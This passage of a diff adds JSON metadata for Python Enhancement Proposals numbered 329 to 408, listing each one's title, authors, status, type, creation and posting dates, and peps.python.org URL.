"Standards Track", + "topic": "", + "created": "18-Apr-2004", + "python_version": "2.4", + "post_history": "18-Apr-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0329/" + }, + "330": { + "number": 330, + "title": "Python Bytecode Verification", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "17-Jun-2004", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0330/" + }, + "331": { + "number": 331, + "title": "Locale-Independent Float/String Conversions", + "authors": "Christian R. Reis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2003", + "python_version": "2.4", + "post_history": "21-Jul-2003, 13-Aug-2003, 18-Jun-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0331/" + }, + "332": { + "number": 332, + "title": "Byte vectors and String/Unicode Unification", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2004", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0332/" + }, + "333": { + "number": 333, + "title": "Python Web Server Gateway Interface v1.0", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "07-Dec-2003", + "python_version": null, + "post_history": "07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3333", + "url": "https://peps.python.org/pep-0333/" + }, + "334": { + "number": 334, + "title": "Simple Coroutines via SuspendIteration", + "authors": "Clark C. Evans", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2004", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0334/" + }, + "335": { + "number": 335, + "title": "Overloadable Boolean Operators", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Aug-2004", + "python_version": "3.3", + "post_history": "05-Sep-2004, 30-Sep-2011, 25-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0335/" + }, + "336": { + "number": 336, + "title": "Make None Callable", + "authors": "Andrew McClelland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Oct-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0336/" + }, + "337": { + "number": 337, + "title": "Logging Usage in the Standard Library", + "authors": "Michael P. Dubner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2004", + "python_version": "2.5", + "post_history": "10-Nov-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0337/" + }, + "338": { + "number": 338, + "title": "Executing modules as scripts", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2004", + "python_version": "2.5", + "post_history": "08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0338/" + }, + "339": { + "number": 339, + "title": "Design of the CPython Compiler", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "02-Feb-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0339/" + }, + "340": { + "number": 340, + "title": "Anonymous Block Statements", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0340/" + }, + "341": { + "number": 341, + "title": "Unifying try-except and try-finally", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0341/" + }, + "342": { + "number": 342, + "title": "Coroutines via Enhanced Generators", + "authors": "Guido van Rossum, Phillip J. Eby", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0342/" + }, + "343": { + "number": 343, + "title": "The \"with\" Statement", + "authors": "Guido van Rossum, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-May-2005", + "python_version": "2.5", + "post_history": "02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, 30-Jul-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0343/" + }, + "344": { + "number": 344, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0344/" + }, + "345": { + "number": 345, + "title": "Metadata for Python Software Packages 1.2", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "28-Apr-2005", + "python_version": "2.7", + "post_history": "`22-Dec-2009 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/MKHXVV746H7ZDFN62Z72VNAX6KIRXNRO/", + "requires": null, + "replaces": "314", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0345/" + }, + "346": { + "number": 346, + "title": "User Defined (\"``with``\") Statements", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0346/" + }, + "347": { + "number": 347, + "title": "Migrating the Python CVS to Subversion", + "authors": "Martin von L\u00f6wis", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "14-Jul-2004", + "python_version": null, + "post_history": "14-Jul-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0347/" + }, + "348": { + "number": 348, + "title": "Exception Reorganization for Python 3.0", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0348/" + }, + "349": { + "number": 349, + "title": "Allow str() to return unicode strings", + "authors": "Neil Schemenauer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2005", + "python_version": "2.5", + "post_history": "06-Aug-2005", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/M2Y3PUFLAE23NPRJPVBYF6P5LW5LVN6F/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0349/" + }, + "350": { + "number": 350, + "title": "Codetags", + "authors": "Micah Elliott", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "27-Jun-2005", + "python_version": null, + "post_history": "10-Aug-2005, 26-Sep-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0350/" + }, + "351": { + "number": 351, + "title": "The freeze protocol", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0351/" + }, + "352": { + "number": 352, + "title": "Required Superclass for Exceptions", + "authors": "Brett Cannon, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0352/" + }, + "353": { + "number": 353, + "title": "Using ssize_t as the index type", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0353/" + }, + "354": { + "number": 354, + "title": "Enumerations in Python", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2005", + "python_version": "2.6", + "post_history": "20-Dec-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "435", + "url": "https://peps.python.org/pep-0354/" + }, + "355": { + "number": 355, + "title": "Path - Object oriented filesystem paths", + "authors": "Bj\u00f6rn Lindqvist", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0355/" + }, + "356": { + "number": 356, + "title": "Python 2.5 Release Schedule", + "authors": "Neal Norwitz, Guido van Rossum, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "07-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0356/" + }, + "357": { + "number": 357, + "title": "Allowing Any Object to be Used for Slicing", + "authors": "Travis Oliphant", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0357/" + }, + "358": { + "number": 358, + "title": "The \"bytes\" Object", + "authors": "Neil Schemenauer, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2006", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0358/" + }, + "359": { + "number": 359, + "title": "The \"make\" Statement", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2006", + "python_version": "2.6", + "post_history": "05-Apr-2006, 06-Apr-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0359/" + }, + "360": { + "number": 360, + "title": "Externally Maintained Packages", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "30-May-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0360/" + }, + "361": { + "number": 361, + "title": "Python 2.6 and 3.0 Release Schedule", + "authors": "Neal Norwitz, Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jun-2006", + "python_version": "2.6, 3.0", + "post_history": "17-Mar-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0361/" + }, + "362": { + "number": 362, + "title": "Function Signature Object", + "authors": "Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2006", + "python_version": "3.3", + "post_history": "04-Jun-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120682.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0362/" + }, + "363": { + "number": 363, + "title": "Syntax For Dynamic Attribute Access", + "authors": "Ben North", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2007", + "python_version": null, + "post_history": "12-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0363/" + }, + "364": { + "number": 364, + "title": "Transitioning to the Py3K Standard Library", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2007", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0364/" + }, + "365": { + "number": 365, + "title": "Adding the pkg_resources module", + "authors": "Phillip J. Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0365/" + }, + "366": { + "number": 366, + "title": "Main module explicit relative imports", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "2.6, 3.0", + "post_history": "01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0366/" + }, + "367": { + "number": 367, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "2.6", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0367/" + }, + "368": { + "number": 368, + "title": "Standard image protocol and class", + "authors": "Lino Mastrodomenico", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2007", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0368/" + }, + "369": { + "number": 369, + "title": "Post import hooks", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": "02-Dec-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0369/" + }, + "370": { + "number": 370, + "title": "Per user site-packages directory", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0370/" + }, + "371": { + "number": 371, + "title": "Addition of the multiprocessing package to the standard library", + "authors": "Jesse Noller, Richard Oudkerk", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-May-2008", + "python_version": "2.6, 3.0", + "post_history": "`03-Jun-2008 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0371/" + }, + "372": { + "number": 372, + "title": "Adding an ordered dictionary to collections", + "authors": "Armin Ronacher, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2008", + "python_version": "2.7, 3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0372/" + }, + "373": { + "number": 373, + "title": "Python 2.7 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "03-Nov-2008", + "python_version": "2.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0373/" + }, + "374": { + "number": 374, + "title": "Choosing a distributed VCS for the Python project", + "authors": "Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "07-Nov-2008", + "python_version": null, + "post_history": "07-Nov-2008, 22-Jan-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0374/" + }, + "375": { + "number": 375, + "title": "Python 3.1 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "08-Feb-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0375/" + }, + "376": { + "number": 376, + "title": "Database of Installed Python Distributions", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Feb-2009", + "python_version": "2.7, 3.2", + "post_history": "`22-Jun-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0376/" + }, + "377": { + "number": 377, + "title": "Allow __enter__() methods to skip the statement body", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "08-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0377/" + }, + "378": { + "number": 378, + "title": "Format Specifier for Thousands Separator", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "12-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0378/" + }, + "379": { + "number": 379, + "title": "Adding an Assignment Expression", + "authors": "Jervis Whitley", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0379/" + }, + "380": { + "number": 380, + "title": "Syntax for Delegating to a Subgenerator", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-June/112010.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0380/" + }, + "381": { + "number": 381, + "title": "Mirroring infrastructure for PyPI", + "authors": "Tarek Ziad\u00e9, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Mar-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0381/" + }, + "382": { + "number": 382, + "title": "Namespace Packages", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Apr-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0382/" + }, + "383": { + "number": 383, + "title": "Non-decodable Bytes in System Character Interfaces", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0383/" + }, + "384": { + "number": 384, + "title": "Defining a Stable ABI", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-May-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0384/" + }, + "385": { + "number": 385, + "title": "Migrating from Subversion to Mercurial", + "authors": "Dirkjan Ochtman, Antoine Pitrou, Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "25-May-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0385/" + }, + "386": { + "number": 386, + "title": "Changing the version comparison module in Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Jun-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "440", + "url": "https://peps.python.org/pep-0386/" + }, + "387": { + "number": 387, + "title": "Backwards Compatibility Policy", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "18-Jun-2009", + "python_version": null, + "post_history": "`19-Jun-2009 `__, `12-Jun-2020 `__, `19-Dec-2022 `__, `16-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": "291", + "superseded_by": null, + "url": "https://peps.python.org/pep-0387/" + }, + "389": { + "number": 389, + "title": "argparse - New Command Line Parsing Module", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Sep-2009", + "python_version": "2.7, 3.2", + "post_history": "27-Sep-2009, 24-Oct-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0389/" + }, + "390": { + "number": 390, + "title": "Static metadata for Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "10-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-April/020597.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0390/" + }, + "391": { + "number": 391, + "title": "Dictionary-Based Configuration For Logging", + "authors": "Vinay Sajip", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0391/" + }, + "392": { + "number": 392, + "title": "Python 3.2 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-Dec-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0392/" + }, + "393": { + "number": 393, + "title": "Flexible String Representation", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0393/" + }, + "394": { + "number": 394, + "title": "The \"python\" Command on Unix-Like Systems", + "authors": "Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hron\u010dok, Carol Willing", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Mar-2011", + "python_version": null, + "post_history": "04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, 26-Jun-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116594.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0394/" + }, + "395": { + "number": 395, + "title": "Qualified Names for Modules", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2011", + "python_version": "3.4", + "post_history": "05-Mar-2011, 19-Nov-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0395/" + }, + "396": { + "number": 396, + "title": "Module Version Numbers", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "16-Mar-2011", + "python_version": null, + "post_history": "05-Apr-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0396/" + }, + "397": { + "number": 397, + "title": "Python launcher for Windows", + "authors": "Mark Hammond, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Mar-2011", + "python_version": "3.3", + "post_history": "21-Jul-2011, 17-May-2011, 15-Mar-2011", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120505.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0397/" + }, + "398": { + "number": 398, + "title": "Python 3.3 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Mar-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0398/" + }, + "399": { + "number": 399, + "title": "Pure Python/C Accelerator Module Compatibility Requirements", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Apr-2011", + "python_version": "3.3", + "post_history": "04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0399/" + }, + "400": { + "number": 400, + "title": "Deprecate codecs.StreamReader and codecs.StreamWriter", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-May-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0400/" + }, + "401": { + "number": 401, + "title": "BDFL Retirement", + "authors": "Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "01-Apr-2009", + "python_version": null, + "post_history": "01-Apr-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0401/" + }, + "402": { + "number": 402, + "title": "Simplified Package Layout and Partitioning", + "authors": "Phillip J. Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2011", + "python_version": "3.3", + "post_history": "20-Jul-2011", + "resolution": null, + "requires": null, + "replaces": "382", + "superseded_by": null, + "url": "https://peps.python.org/pep-0402/" + }, + "403": { + "number": 403, + "title": "General purpose decorator clause (aka \"@in\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "13-Oct-2011", + "python_version": "3.4", + "post_history": "13-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0403/" + }, + "404": { + "number": 404, + "title": "Python 2.8 Un-release Schedule", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "09-Nov-2011", + "python_version": "2.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0404/" + }, + "405": { + "number": 405, + "title": "Python Virtual Environments", + "authors": "Carl Meyer", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Jun-2011", + "python_version": "3.3", + "post_history": "24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119668.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0405/" + }, + "406": { + "number": 406, + "title": "Improved Encapsulation of Import State", + "authors": "Alyssa Coghlan, Greg Slodkowicz", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Jul-2011", + "python_version": "3.4", + "post_history": "31-Jul-2011, 13-Nov-2011, 04-Dec-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0406/" + }, + "407": { + "number": 407, + "title": "New release cycle and introducing long-term support versions", + "authors": "Antoine Pitrou, Georg Brandl, Barry Warsaw", + "discussions_to": null, + "status": "Deferred", + "type": "Process", + "topic": "", + "created": "12-Jan-2012", + "python_version": null, + "post_history": "17-Jan-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0407/" + }, + "408": { + "number": 408, + "title": "Standard library __preview__ package", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2012", + 